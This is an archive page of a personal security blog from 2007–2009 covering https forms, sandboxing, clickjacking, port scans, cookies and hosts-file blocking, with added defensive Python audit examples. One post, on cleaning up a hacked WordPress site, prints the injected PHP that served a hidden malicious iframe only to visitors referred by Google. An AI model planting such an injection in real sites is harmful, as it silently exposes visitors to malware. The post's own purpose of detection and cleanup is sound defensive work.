A Programmer explores the IT Security field, offering packets of useful information he picks up along the way.

Archive for the ‘Internet security’

To https or not to https

September 08, 2009 By: Ron Category: Internet security 2 Comments →

Got an interesting dilemma I want to share with you. I was on the phone the other day squaring away a bill with my homeowners insurance company, Preferred Mutual. I paid a bill over the phone and asked if I could enroll in automatic deductions from my checking account so that I wouldn’t need to worry about it, something I like to do with most of my bills. Anyway, the representative told me that I can enroll in automatic deductions online and proceeded to help me navigate to the following page:

http://www.pminsco.com/Billing/AEFT.aspx

Here is the screenshot of the page; you can click on the image to get a bigger picture.

pminsco_screen_shot

I was about to start filling out the form with sensitive information, including bank routing information, when I stopped dead in my tracks. Notice that the URL above is not https but rather http, which tells me that the connection between my browser and the web server at Preferred Mutual is not encrypted. That means my data, including bank routing information, is sent over the Internet for anyone to read straight out; not good, my friends. If I was reading the news on CNN or looking up movie times online, the connection is typically not encrypted, which is totally fine and expected. However, if at any time I am submitting sensitive data, logged on to my bank, or even reading mail at Gmail, then it is absolutely imperative that the connection is over a secured and encrypted line. SSL (https) establishes end-to-end encryption between my browser and the server I’m connecting to. As someone who has done some programming on the web, I know that the form page can, in fact, be a non-SSL URL and then, when the form is actually submitted (the user clicks the submit button), the page with the sensitive data is sent to the server over SSL. The problem with that way of handling it is that the user (myself) does not know for sure that the submitted data will be encrypted over SSL. The only way to check would be to actually look at the HTML source code and see where this form goes from this point. Here is a snippet of HTML code:

<form name="aspnetForm" method="post" action="AEFT.aspx" id="aspnetForm">

This shows that the form is submitted to a page resource named “AEFT.aspx”, which happens to be the server-side code that actually generated the page with the form. In essence, this server-side code is multifunctional: it can show the form you see above in one context and process the form in another context when the user submits it. In any case, no matter which context, this page is unencrypted and that is precisely why I’m not going to use it. Some might argue, “Come on – don’t be so paranoid; what are the chances of someone intercepting your data?” True, it is a long shot, but not a chance I’m willing to take. Keep in mind that if you were using unprotected WiFi or the internet offered at a hotel, this data would be sent over the air in the clear; easy to intercept and even more of a reason to refrain from entering your private data on a page like this. However, even in my case at home, where I would send it over an encrypted WiFi connection, I’m playing it safer and plan on asking Preferred Mutual if I can give them the information over the phone.
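The check described above (find every form on the page and work out where it will actually post) can be automated. The following is an added example, not code from the original post or from Preferred Mutual: it parses the HTML of a page, resolves each form action against the page URL the way a browser does, and reports whether the submission will travel over https. The sample page is constructed for the example; only the first form tag mirrors the one quoted above, and secure.example.com is a made-up host.

```python
"""Audit where the forms on a page will submit their data.

Added example, not from the original post. Given a page's HTML and the URL it
was loaded from, resolve each <form action> the way the browser would and report
whether the submission goes over https. The sample page below is constructed;
only the first form tag mirrors the one quoted in the post."""
from html.parser import HTMLParser
from urllib.parse import urljoin, urlsplit


class FormCollector(HTMLParser):
    """Collect (name, method, action) for every <form> tag on the page."""

    def __init__(self):
        super().__init__()
        self.forms = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() == "form":
            a = dict(attrs)
            self.forms.append((a.get("name") or a.get("id") or "",
                               (a.get("method") or "get").lower(),
                               a.get("action") or ""))


def audit_forms(page_url, html):
    """Return one dict per form describing where it submits.

    An empty or relative action resolves against the page URL (an empty action
    means "post back to this same page"), so a form on an http page inherits
    http unless the action names an https URL explicitly."""
    parser = FormCollector()
    parser.feed(html)
    results = []
    for name, method, action in parser.forms:
        target = urljoin(page_url, action)
        results.append({
            "form": name,
            "method": method,
            "submits_to": target,
            "encrypted": urlsplit(target).scheme == "https",
        })
    return results


# Constructed sample: an http page carrying the post-back form from the post
# plus a hypothetical second form whose action names an https URL.
SAMPLE_URL = "http://www.pminsco.com/Billing/AEFT.aspx"
SAMPLE_HTML = """
<html><body>
<form name="aspnetForm" method="post" action="AEFT.aspx" id="aspnetForm">
  <input name="routing"><input type="submit">
</form>
<form name="loginForm" method="post" action="https://secure.example.com/login">
  <input name="user"><input type="submit">
</form>
</body></html>
"""

if __name__ == "__main__":
    for r in audit_forms(SAMPLE_URL, SAMPLE_HTML):
        flag = "ok" if r["encrypted"] else "CLEARTEXT"
        print(f"{r['form']:<12} {r['method']:<5} -> {r['submits_to']}  [{flag}]")
```

Note the caveat the post itself makes: even when the second form’s action says https, the page that carries it arrived over plain http, so anyone able to alter it in transit could just as easily have changed that action. The only arrangement a user can verify from the address bar is the page itself being served over https.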

What do you think?  Is this something you’d be OK with?  Would love some comments on this post.

Sandboxie

February 05, 2009 By: Ron Category: Internet security, Virtual Machine 2 Comments →

I want to talk about this exciting program I’ve been using lately called Sandboxie. I was first introduced to Sandboxie on a Security Now podcast a while back. Then recently, Leo and Steve did another podcast where they took a more in-depth look at this now mature program. I even purchased a license which includes all new upgrades to Sandboxie for life! What a great deal! The podcast on Sandboxie couldn’t have come at a more appropriate time for me. I had just purchased a new Dell laptop with Vista; yeah yeah, I know I’m a big Apple/Mac fan-boy, but I really couldn’t justify spending over my budget for a new MacBook. I ended my dilemma by settling for a bottom-of-the-line Dell Inspiron with Vista. The truth is that I’m actually very happy with my Dell and I’m even happy – so far – with Vista. Everything works – so far so good. After I ordered my laptop I was thinking about how to keep my new system clean and free of anything malicious such as spyware, adware, etc. This happens to be more of a challenge in a Windows environment. Then I heard about Sandboxie.

So what is Sandboxie? A while back we talked a little bit about Virtual Machines and how I was able to run Windows on my Mac using Parallels. With Parallels you need to set aside memory and actually install the OS you want to run in the VM, so that you essentially have two systems on one computer. Sandboxie is a “lightweight” VM that doesn’t actually need a separate OS to run; it runs as a program on Windows. Sandboxie allows you to run any program within a “contained environment”. Within that environment no permanent changes or modifications can be made to your system. So which programs do I run in Sandboxie? I have two programs that are the most likely vectors for something malicious getting into my system: my web browser, Firefox, and my email client, Thunderbird. I therefore ran these programs within Sandboxie before I wrote this post. They are running in their own separate space and can’t harm my system. I’m a careful user of the Internet and follow some best practices, such as never downloading anything that is not reputable or clicking on a link in an email from someone I don’t know. However, even the most savvy user can be vulnerable; the bad guys are getting smarter and smarter. So what happens if I suspect I may have accidentally clicked on an unsavory link or downloaded a dangerous file? I wipe my sandbox clean and start fresh. Any malicious files or potential malware are contained in the sandbox, never able to harm any part of my system outside of the sandbox. How cool is that? Keep in mind that you must start using Sandboxie on a computer that is in a healthy state; otherwise Sandboxie is useless and all bets are off. Reformat your hard drive and install Windows fresh, or start with a new computer.

This is all nice, and I can see how Sandboxie can be a very useful tool for running programs in isolation, but there are times where I would need my program to make changes to my system. Here’s a good example. I’m browsing the web using Firefox “sandboxed” and then I go to the popular networking site Facebook, where there is a picture of me posted by a friend that I would like to download, save and share with others. So I click “save picture” and proceed to save it to My Documents, and here is the pop-up that appears from Sandboxie:

What’s happening here is that your “sandboxed” Firefox wants to save a file to your Documents folder, which is outside the sandbox. If you click “close”, the file will be saved – actually saved – in a directory tree under the sandbox, C:\Sandbox\goodbin\DefaultBox, where “DefaultBox” is your default sandbox (Sandboxie allows you to create different sandboxes that behave differently for different uses). If you click on the recover box, then you are giving Sandboxie permission to save this file to your Documents folder. If you clicked on close and saved the file to your “sandboxed” Documents folder, then you can open Windows Explorer in “sandboxed” mode and you’ll see the files. See the screenshot below with two different Windows Explorer windows; the one in “sandboxed” mode shows the files, while the Windows Explorer that is not “sandboxed” does not show the files.

When you download in Sandboxie, it writes all those new files and system modifications (unless you say it’s OK to save outside the sandbox) into the sandbox “C: location”, C:\Sandbox. Remember, nothing changed outside the sandboxed environment. That means if you downloaded some changes to your “money management” program using Sandboxie, you will see those changes only if you run your money program from the sandbox. If you run it from its regular icon, no changes will have taken effect. For the more technical users this can come in handy if you want to see how a program behaves when it runs on your system. You run the program sandboxed and then go into the C:\Sandbox directory to see which system files were changed or which new ones were created. Perhaps you are auditing a program, or are curious to see what the change is so that you can feel safe about modifying your system files “unsandboxed”. See the screenshot below showing the C:\Sandbox tree. Notice the different program directories for Thunderbird and Mozilla.

So far, my experience with Sandboxie has been very positive. The interview on the Security Now podcast with the author of Sandboxie, Ronen Tzur from Israel, was very interesting. Sandboxie is a great addition to your security toolbox. Remember, there is no silver bullet security solution, and how often you clean out your sandbox depends on your level of paranoia.

Clickjacking

December 30, 2008 By: Ron Category: Internet security, Web App Security 1 Comment →

It’s been a while since I last posted; I do apologize, things have been hectic. I hope to make it up to you with a post on a new web vulnerability called Clickjacking. There has been a lot of buzz in the security community around Clickjacking ever since Robert Hansen and Jeremiah Grossman decided to cancel their talk on a new exploit they were going to introduce at the OWASP conference, which I attended back in September. Adobe got wind of their talk and asked them to postpone “airing the issues” to give them time to put a fix out to their users. It turns out that it’s really a browser flaw and not Adobe’s problem, though; we’ll get into that.

So what is Clickjacking? Clickjacking is an interesting exploit since it is not a bug or defect in the browser software but rather a design flaw, which will get clearer as we go on. Clickjacking, as its name suggests, is about getting a user to click on something they didn’t intend to click on and are not even aware they are clicking on. This is accomplished by loading a web page that has a hidden page, or multiple pages, behind the web page you are actually seeing. The way this is done is by placing a “click here” button that looks perfectly fine, but “underneath” the button is where a malicious site would place something that might be harmful. There is a great demo here on the topic of clickjacking where you can see the hidden page behind the one with the buttons that say “click here”. They say a picture is worth a thousand words – it’s one thing for me to explain it and another to actually see the hidden page appear.

One of Robert and Jeremiah’s examples to demonstrate Clickjacking used Adobe Flash Player. They showed how easy it was to have a user click on something benign that turned on your computer’s video camera (if you had one). It is a real scary thing for a malicious site to be able to turn on your video camera without your knowledge! Robert and Jeremiah postponed their talk, and Adobe has since taken responsibility and fixed the Clickjacking issue, but only for the case where Flash Player is the avenue of a Clickjacking attack. Clickjacking is an issue for all browsers, with or without JavaScript enabled, since Clickjacking can be accomplished with CSS and DHTML alone. This exploit, however, must be viewed within the larger picture. It isn’t a flaw or a browser software bug but, rather, a complex vulnerability that became real due to the way we’ve evolved with the Internet. Our browsers have become more and more complex, which creates an environment where sophisticated exploits can breed and grow and become a reality. It turns out that the concept behind this exploit was documented as far back as 2002. However, back in 2002 the internet was a much simpler place and the idea of clickjacking wasn’t much of a threat. We live in a much different Web 2.0 Internet world now.

Firefox users that have the “NoScript” plugin can go out and get an update that will protect them from Clickjacking.  The users on all other browsers will need to wait.  In the meantime, as usual, please be careful where you go out on the net.
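Site owners were not entirely powerless either, even if the post above (December 2008) could only point users at NoScript. Browsers subsequently adopted two response headers that let a site refuse to be framed, which removes the hidden-page-behind-a-button setup at the source: X-Frame-Options and the frame-ancestors directive of Content-Security-Policy. The following is an added example, not code from the original post, that reads a response’s headers and reports how framable the page is; the header sets are constructed, and partner.example is a made-up host.

```python
"""Report whether a page's headers let a browser refuse to frame it.

Added example, not from the original post, which predates these headers.
X-Frame-Options (DENY / SAMEORIGIN / ALLOW-FROM) and the CSP frame-ancestors
directive are the server-side defences browsers adopted against clickjacking.
The sample header sets below are constructed for the example."""


def framing_policy(headers):
    """Return 'deny', 'sameorigin', 'restricted' or 'frameable' for a response.

    Header names are matched case-insensitively. A CSP frame-ancestors directive
    takes precedence, because browsers that understand it ignore X-Frame-Options
    when both are present."""
    h = {k.lower(): v for k, v in headers.items()}
    csp = h.get("content-security-policy", "")
    for directive in csp.split(";"):
        parts = directive.strip().split()
        if parts and parts[0].lower() == "frame-ancestors":
            sources = [s.strip("'").lower() for s in parts[1:]]
            if sources == ["none"]:
                return "deny"
            if sources == ["self"]:
                return "sameorigin"
            if sources:
                return "restricted"      # a named list of origins may frame it
    xfo = h.get("x-frame-options", "").strip().lower()
    if xfo == "deny":
        return "deny"
    if xfo == "sameorigin":
        return "sameorigin"
    if xfo.startswith("allow-from"):
        return "restricted"
    return "frameable"                   # nothing stops another site framing it


# Constructed header sets: an unprotected page (how most sites looked at the
# time of the post) and three protected configurations.
SAMPLE_RESPONSES = {
    "unprotected": {"Content-Type": "text/html"},
    "xfo_deny": {"X-Frame-Options": "DENY"},
    "csp_self": {"content-security-policy": "default-src 'self'; frame-ancestors 'self'"},
    "csp_partner": {"Content-Security-Policy": "frame-ancestors https://partner.example"},
}

if __name__ == "__main__":
    for label, hdrs in SAMPLE_RESPONSES.items():
        print(f"{label:<12} -> {framing_policy(hdrs)}")
```

A page reporting “frameable” is the one to worry about: any site can load it invisibly underneath its own buttons. “sameorigin” or “deny” is what a login page, a settings page, or anything with a button that does something on the user’s behalf should be returning.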

ShieldsUp

August 24, 2008 By: Ron Category: Internet security 1 Comment →

Steve Gibson from GRC.com provides a free port scanning tool called ShieldsUp that I was playing with the other day. You can perform the scan of your network here. Before doing the scan, make sure you have permission from your network administrator, since ShieldsUp will probe ports of the IP address that your browser made the connection from and therefore can trip your company’s IDS. Of course, if you’re doing this from home you will not have to concern yourself with this; just click on the link and proceed with the firewall check. It’s good to know that this service cannot be used as a hacking tool like Nmap, since one cannot scan a specified IP address.

We talked about egress filtering in a prior post – you can refer to that here as a refresher. A port, also referred to as a software port, is a logical point on the computer where a remote connection takes place. A popular port number is port 80, where you would typically run the web server service. As you read this page, your computer connected to this blog’s web server on port 80. Once the connection on a port is made between a remote computer and the host computer, communication can begin between the two endpoints. Besides a web server, there are other legitimate situations where a service would run on a computer and listen on a port for a client to connect. For example, programs like Remote Access and file sharing, as well as others, need to listen for incoming requests. In order for a remote machine to make a connection to your computer it would need a port, or a “window”, to get in. It becomes essential to be aware if such a window to your computer exists, and if it’s open and not needed, then it should be closed immediately.

Most of us home users use some sort of router.  A router allows us to share connections between multiple computers either wired or wireless, which comes in handy these days where it’s quite typical to find more than one computer in today’s homes.  Another feature of the router is that it acts as a firewall between the internet and your computers on your network.  Found this definition of a firewall at GRC.com:

“A firewall ABSOLUTELY ISOLATES your computer from the Internet using a “wall of code” that inspects each individual “packet” of data as it arrives at either side of the firewall – inbound to or outbound from your computer – to determine whether it should be allowed to pass or be blocked. “

So I recently switched my internet service from FiOS to Cablevision. Cablevision installed the cable and connected our Mac to the Internet without supplying a router. I haven’t had a chance to get a router yet, and our Mac is now directly connected to the Internet. I’m not worried, since our Mac has a built-in software firewall; more on that soon. So I decided to run ShieldsUp to see the status of my ports prior to hooking up my router.


The test checked all the service ports 0 – 1055. As you can see in the screenshot, I received almost all blue boxes (representing ports) with a few green, and a “FAILED” rating. What do the colors blue, green and red mean? OK, red means the port is open and listening for incoming connections and ready to serve which, remember, isn’t necessarily a bad thing; it’s only bad if you aren’t aware of any services that should be running. Blue means that the port is actually closed and no service is running on that port, which means that no connections can be made. That’s good. Green is “stealth”, a term Steve Gibson coined. A port is “stealthed” if, when probing the port on the remote computer or router, there is no response at all. There is complete silence on the wire. There is a debate in the TCP/IP Internet world regarding the notion of “stealth” vs. closed ports. Steve felt that a TCP/IP port shouldn’t respond but rather drop the request completely. In his opinion a “stealthed” port is better than a closed port. If a port responds that it is closed, that in itself tells the remote machine that there is a system on the other end that exists and is “out there”. If your system is completely “stealthed”, a hacker wouldn’t even know if your system was actually connected to the Internet. Steve feels that this added layer of privacy makes it more secure. The “FAILED” message that I received is the verdict of Gibson’s “True Stealth Analysis”, which is why I received a failed rating from this tool.

I did some further reading into the Mac firewall and was surprised to learn that the Leopard OS firewall is turned off by default. Again, if you’re behind a router (which I was before Cablevision), there is no need for concern, since the router is a firewall. However, if you have a laptop and connect to the internet in potentially hostile environments, it would be wise to turn on your Mac firewall. It is surprising that Apple, of all companies who toot their horns about security, would ship Leopard’s firewall off by default. So, the analysis shown in the screenshot above is my Mac connected directly to the internet with no firewall running. If there were any services running on my computer, the ports would have displayed red for open. Why the few green “stealthed” ports? Good question. It turns out that these ports are actually shut down (“stealthed”) by my cable provider, Cablevision, and one of them is port 80 – yup, I can’t run a web server on my Mac unless I use a router and go through some hoops to properly configure it.
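The three colors map onto three things the TCP stack can do when a connection attempt arrives, and you can see all three from a few lines of code. This is an added example, not code from the original post or from ShieldsUp, and it deliberately probes only the loopback address 127.0.0.1 so that it audits what is listening on the machine it runs on: a completed connect() means a service answered (red, open), a refused connection means the stack sent back a reset (blue, closed), and silence until the timeout means something dropped the probe (green, stealthed). The helper that briefly listens on an ephemeral port exists only so the “open” case can be demonstrated without any real service.

```python
"""Classify a TCP port on this machine as open, closed or stealthed.

Added example, not from the original post or ShieldsUp. It only ever talks to
the loopback address, to audit the services listening on the local machine:
  open    - connect() completed, a service is listening (ShieldsUp red)
  closed  - the stack answered with a reset (ShieldsUp blue)
  stealth - no answer before the timeout (ShieldsUp green)"""
import socket

LOOPBACK = "127.0.0.1"


def probe_local_port(port, timeout=1.0):
    """Return 'open', 'closed' or 'stealth' for a TCP port on this machine."""
    with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as s:
        s.settimeout(timeout)
        try:
            s.connect((LOOPBACK, port))
        except ConnectionRefusedError:
            return "closed"        # RST came back: nobody listening here
        except socket.timeout:
            return "stealth"       # nothing came back: the probe was dropped
        return "open"              # handshake completed: a service answered


def audit_local_ports(ports, timeout=1.0):
    """Map each port to its state; every 'open' entry should be explainable."""
    return {p: probe_local_port(p, timeout) for p in ports}


def with_listener(fn):
    """Run fn(port) while a throwaway socket listens on an ephemeral loopback port.

    Returns (port, fn's result). Used only to demonstrate the 'open' state."""
    srv = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    srv.bind((LOOPBACK, 0))
    srv.listen(1)
    port = srv.getsockname()[1]
    try:
        return port, fn(port)
    finally:
        srv.close()


if __name__ == "__main__":
    port, while_listening = with_listener(probe_local_port)
    print(f"port {port} while a service listened: {while_listening}")
    print(f"port {port} after it closed:          {probe_local_port(port)}")
    print(audit_local_ports([22, 80, 443, 3306]))
```

Run the audit against the well-known ports you care about and account for every “open” result; a host with no listeners shows nothing but “closed” here, and it is a firewall in front of the host (or the router, as the post goes on to describe) that turns those answers into the silence ShieldsUp calls stealth.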

Here is a screenshot of the ShieldsUp test performed on my iPod touch mobile browser after configuring my router. Now, with a router between the Internet and the computers on my network, I’m fully “stealthed”.

Web Cookies

December 30, 2007 By: Ron Category: Internet security No Comments →

Since most people love cookies, I thought I’d explore the web cookie topic. Some people have the misconception that cookies can do nefarious things to your computer like copy your files, reveal your identity or damage your computer in some way. As a web user you should understand what cookies do and some of the privacy concerns they raise. With this knowledge I hope you can make an informed decision on what kinds of cookies you allow or block at the browser level, based on your comfort level.

Let’s say you open your browser and go to ‘http://www.amazon.com/’. You’re visiting the site using a browser and acting as the client, while Amazon.com, running a web server, is the server side. The web server handles HTTP requests. HTTP is a stateless protocol, meaning that when I go to a page at Amazon, the web server sends the page to my browser and I see it. When I click on a book that I like, a new request is sent to the web server and a new page is sent back to my browser. The web server has no knowledge of the previous page I clicked. They are like humans with no memory, constantly meeting new people. Now you’re going to ask, “What do you mean that Amazon.com is stateless when it shows my name when I visit and seems to know what books I like?” Good question. This is where cookies come into play. Cookies allow a web server to interact with a client in a stateful fashion. A cookie is a parcel of text that is sent to the server with each request, which allows the server to remember the client. There are different types of cookies used on the internet: persistent cookies and session cookies (or transient cookies). Each of these types of cookies can be turned on or off in the browser settings. A session cookie allows the web server to know who you are as you move from page to page. Session cookies store information in the browser’s memory, which is available for the duration of the browser session. This information is only available as long as your browser remains open. If you close your browser, the session cookie information is gone. It’s called a session cookie because this type of cookie has a short life. For example, your bank’s site will establish a session cookie after you log on that is valid as long as you are interacting with the bank site. However, if you walk away from your computer for a snack, chances are your session will be invalidated, so that when you try to click on your checking activity you’ll be prompted to log in again. This ensures against someone walking over to your computer and viewing your private financial data.

A neat little trick to view your session cookie details is the following: go to a site like ‘amazon.com’ or your bank’s site (really, most sites establish a session cookie to know you as you move around). When you’re on that site, type javascript:alert(document.cookie) into your browser’s address bar. You’ll see a bunch of name/value pairs. One of them is the SID or session-id, which is the ID that tells the web server who is making the request. Very cool indeed.

The other type of cookie is called a ‘persistent cookie’. This cookie is actually stored on your computer in a little file with information that is used by the web server to identify you. When you return to a site that already has a cookie stored on your computer, the browser automatically passes the cookie along with the request. The web server now has some identifying data. So if you visit a site and see that your userid is already populated, or if you go to, say, amazon.com and it says, “Welcome back Ron”, the persistent cookie makes this possible. If website A stores a cookie on your computer, website B can’t access the cookie. However, even if a website somehow was able to access a cookie from another site, the information in the cookie would not make sense. Only the issuing website would be able to make sense of the data stored in the cookie. Another application of a ‘persistent cookie’ is that it can store information about you that will help the website create a page that is customized for you. The cookie files are stored in the /Windows/cookies or /Windows/profiles/username/cookies directories, where username is replaced with the user’s login name. If your operating system directory is not named Windows (such as Winnt for Windows NT), then look in that directory instead of the Windows directory. If you like, you can delete all of them, or delete them only for sites you don’t want to be storing cookies.
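What separates a session cookie from a persistent one is visible in the Set-Cookie header the server sends: a cookie with neither an Expires nor a Max-Age attribute lives only in browser memory, while one carrying either attribute is written to disk and returned on later visits. The following is an added example, not code from the original post, that parses such headers and classifies each cookie. It also reports two flags the post does not cover: Secure, which keeps the cookie off plain http connections (the concern of the “To https or not to https” post above), and HttpOnly, which hides the cookie from the document.cookie trick just described. The header lines and domains are constructed.

```python
"""Parse Set-Cookie headers; tell session cookies from persistent ones.

Added example, not from the original post. No Expires/Max-Age means a session
cookie (browser memory only); either attribute means a persistent cookie
(written to disk). Secure and HttpOnly are reported as well. Sample headers
below are constructed; the domains are made up."""
from email.utils import parsedate_to_datetime


def parse_set_cookie(header):
    """Turn one Set-Cookie header value into name, value and lower-cased attributes."""
    parts = [p.strip() for p in header.split(";")]
    name, _, value = parts[0].partition("=")
    attrs = {}
    for attr in parts[1:]:
        k, _, v = attr.partition("=")
        attrs[k.strip().lower()] = v.strip() if v else True   # bare flags become True
    return {"name": name.strip(), "value": value.strip(), "attrs": attrs}


def classify(cookie):
    """Return (kind, warnings): kind is 'session' or 'persistent [...]'."""
    a = cookie["attrs"]
    if "max-age" in a or "expires" in a:
        kind = "persistent"
        if "expires" in a and "max-age" not in a:
            # Expires is an RFC 1123 date; Max-Age (seconds) wins when both appear.
            kind += f" (until {parsedate_to_datetime(a['expires']).date()})"
    else:
        kind = "session"
    warnings = []
    if "secure" not in a:
        warnings.append("sent over plain http too")
    if "httponly" not in a:
        warnings.append("readable via document.cookie")
    return kind, warnings


def summarize(headers):
    """Return {cookie name: (kind, warnings)} for a list of Set-Cookie values."""
    return {c["name"]: classify(c) for c in map(parse_set_cookie, headers)}


# Constructed sample headers: a login session id, a "remember me" cookie and
# an ad-network tracking cookie of the kind third-party cookies are about.
SAMPLE_HEADERS = [
    "SID=3fa9c1e2d0; Path=/; Secure; HttpOnly",
    "remember_user=ron; Max-Age=2592000; Path=/",
    "trk=ab12; Domain=.ads.example; Expires=Wed, 01 Jan 2031 00:00:00 GMT",
]

if __name__ == "__main__":
    for name, (kind, warns) in summarize(SAMPLE_HEADERS).items():
        print(f"{name:<14} {kind:<28} {'; '.join(warns) or 'flags ok'}")
```

The session id is the one that matters most: because it stands in for your login for the life of the browser session, it is the cookie you want marked Secure (never sent in the clear) and HttpOnly (never exposed to a script on the page). Paste the headers from your own bank’s login response into SAMPLE_HEADERS to see how it fares.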

So what’s the bottom line? Are cookies dangerous in any way? Should I block cookies from being set? The truth is that cookies aren’t dangerous and cannot do anything detrimental to your computer. Cookies can’t get any more information about you than what you give the website issuing the cookie. Also, cookies are not able to help the web server read files on your computer.

A good practice that users employ is to browse the internet with cookies turned off by default. Once you visit a site and decide to trust that site, you can then proceed to add the site and allow your browser to accept cookies from this site. You can also view the site’s privacy policies to make sure that you’re comfortable with their policies.

In a future post I will talk about third-party cookies. These cookies raise privacy concerns, since they allow ad companies to track the different types of site you visit and then tailor their ads based on the data collected.

My good friend’s site got hacked.

November 18, 2007 By: Ron Category: Internet security 1 Comment →

A friend of mine, Shimon Sandler, has a website that got hacked. He turned to me for help. Shimon runs a popular blog on SEO (Search Engine Optimization). When you do a search in Google for “Shimon Sandler” he is always number one (he’s very good at what he does). A few weeks back Shimon’s site got “blacklisted”, which means that when you clicked on the link to his site a message popped up on your screen. It said, “Warning: visiting this site may harm your computer”. With the help of Matt Cutts from Google we discovered the “malware”! This malicious software reared its ugly head ONLY if the prior page (the referrer) was any page from Google. The “curl” command came in handy in this case. You certainly never want to click on a suspicious link. Curl is a command that allows you to download a URL so that you can view it in a text editor rather than requesting it in a browser.

1. Fetch the page with a Google referrer:
curl -H 'Referer: http://www.google.com/search?hl=en&q=rbn' http://www.shimonsandler.com/ > /tmp/1

2. Fetch the page with no referrer:
curl http://www.shimonsandler.com/ > /tmp/2

3. Compare the two pages:
diff -u /tmp/2 /tmp/1

The cloaking/malware is included via this line:
<iframe src="http://302found.net/in.cgi?20" mce_src="http://302found.net/in.cgi?20" style="display:none;"></iframe>

As you can see, I requested two pages. One was just straight www.shimonsandler.com with no Referrer page and the other was www.shimonsandler.com with a Google Referrer in there. The one with the Google Referrer shows an iframe with a suspicious link! That is the “mal-ware”.

I then logged onto Shimon’s web-server and found the server code responsible for displaying this iframe link.

Here is the command I used to find which script file contained “302found” (the extra /dev/null argument makes grep print the file name next to each matching line):
find . -type f -exec grep 302found {} /dev/null \;

Here we are:
./wp-content/themes/SS-shimon_sandler/sidebar.php:<?php $rf = $_SERVER['HTTP_REFERER']; $se = "google"; if (preg_match("/$se/",$rf)) { echo '<iframe src="http://302found.net/in.cgi?20" mce_src="http://302found.net/in.cgi?20" style="display:none;"></iframe>';} ?>

You can see the code is doing a check on the referrer, and if the URL contains “google” then it writes this nasty iframe out to the HTML, styled so that no one could see it on the page.
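The two steps above (fetch with and without a search-engine referrer, then look for what only the referred copy contains) are exactly the detection a site owner can script, since it works on the served HTML and never needs to trust the server’s own files. The following is an added example, not code from the original post: it lists the hidden iframes in each response and reports those present only in the referred one, which is the cloaking signature seen here, and a second helper walks a site tree for an indicator string, the job done above with find and grep. Both sample bodies are constructed; the iframe line is the one quoted above.

```python
"""Detect a referrer-conditional hidden iframe, the way the post's curl/diff did.

Added example, not from the original post. Compare the page fetched without a
referrer against the one fetched with a search-engine referrer and report the
hidden iframes served only in the second. files_containing() is the
find/grep step. Sample bodies are constructed; the iframe is the one quoted."""
import os
from html.parser import HTMLParser


class IframeFinder(HTMLParser):
    """Collect the src of every iframe whose inline style hides it."""

    def __init__(self):
        super().__init__()
        self.hidden = []

    def handle_starttag(self, tag, attrs):
        if tag.lower() != "iframe":
            return
        a = dict(attrs)
        style = (a.get("style") or "").replace(" ", "").lower()
        if "display:none" in style or "visibility:hidden" in style:
            self.hidden.append(a.get("src") or "")


def hidden_iframes(html):
    """Sources of hidden iframes in one HTML document."""
    p = IframeFinder()
    p.feed(html)
    return p.hidden


def cloaked_injections(plain_html, referred_html):
    """Hidden iframes served only when the request carried the search-engine referrer."""
    return sorted(set(hidden_iframes(referred_html)) - set(hidden_iframes(plain_html)))


def files_containing(root, needle):
    """Relative paths under root whose contents mention needle (find ... -exec grep)."""
    hits = []
    for dirpath, _, names in os.walk(root):
        for n in names:
            path = os.path.join(dirpath, n)
            try:
                with open(path, encoding="utf-8", errors="replace") as f:
                    if needle in f.read():
                        hits.append(os.path.relpath(path, root))
            except OSError:
                pass                       # unreadable file: skip, keep scanning
    return sorted(hits)


# Constructed responses: the same sidebar with and without the injected iframe.
PLAIN = "<html><body><div id='sidebar'><a href='/about'>About</a></div></body></html>"
REFERRED = ("<html><body><div id='sidebar'><a href='/about'>About</a>"
            '<iframe src="http://302found.net/in.cgi?20" style="display:none;"></iframe>'
            "</div></body></html>")

if __name__ == "__main__":
    for src in cloaked_injections(PLAIN, REFERRED):
        print("cloaked iframe served only to search-engine visitors:", src)
```

Feed real responses in and an empty result from cloaked_injections() is what a clean site should return; any hit gives you the indicator (here the 302found.net host) to pass to files_containing() over the web root to locate the script responsible, as happened with sidebar.php above.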

Soon after I took out that code in the PHP file, Shimon’s site was once again white-listed.

Here is a great link I found with details on what to do if your site gets hacked. Even if your site was never hacked, it’s worth spending the time to review some basic suggestions on how to properly secure your site. Remember, as with all passwords, make sure it’s a strong password. Any password that is just a word, like ‘pumpkin’ or ‘dandelions’, is extremely weak. I can’t say exactly how Shimon’s site got hacked, although if you follow some good security principles, they will better protect you and possibly prevent an attack like this.

The "hosts" file

September 16, 2007 By: Ron Category: Internet security No Comments →

The hosts file can be found on any system hooking up to the Internet and can be a useful tool to help better lock down your system. A little background first. When I request a web page in my browser, say www.cnn.com, my system (unbeknownst to me) sends out a DNS (Domain Name System) query to find out what the IP address is. DNS was created to save us humans the pain of typing and remembering IP addresses. For example, instead of typing in “http://64.236.91.23/”, we can type meaningful URLs like www.cnn.com.

The “hosts” file on your system acts as a local DNS. If there is an entry there, your system will use the IP in your hosts file and will not proceed to query DNS over the Internet. If you open up the hosts file (on my Windows XP it’s here – C:\WINDOWS\system32\drivers\etc), you will see this line:

127.0.0.1 localhost

The statement above creates a mapping between the domain and IP address. If you type ‘localhost’ in your browser it will take you to your web server on your PC, if a webserver is running. The first column in this statement is reserved for the IP address and the second column always contains the hostname. If you have computers on your network that are using fixed IP’s, the “hosts” file would be a good place to put memorable names for your different machines. For example, you would add an entry like the one below:

192.168.1.4 ourmac

Now, if you need to connect to your Mac in order to telnet or to access a website running on that machine, you would just say “http://ourmac”, or “telnet ourmac”.

This is all nice and convenient, but how does this secure my system from spyware, adware or other malicious places I don’t want my computer going to? The solution is simple: add these domains to your hosts file and point them to 127.0.0.1, essentially making these requests go nowhere. Having these entries in your hosts file is telling your computer, “I want you to go to the IP address I set up for this – don’t go and look them up in DNS”. You may have some entries in the hosts file that look like the following:

127.0.0.1 doubleclick.com
127.0.0.1 ads.doubleclick.com
127.0.0.1 ads.msn.com

These entries will block unwanted ad sites. Here you can download an ad-blocking “hosts” file to replace the hosts file on your own PC. Someone spent the time to compile and share this. You can also use the hosts file to block your kids from going to certain sites that you don’t want them going to. While we know there is no “silver bullet” security solution, this hosts file knowledge can help make your computing experience safer.
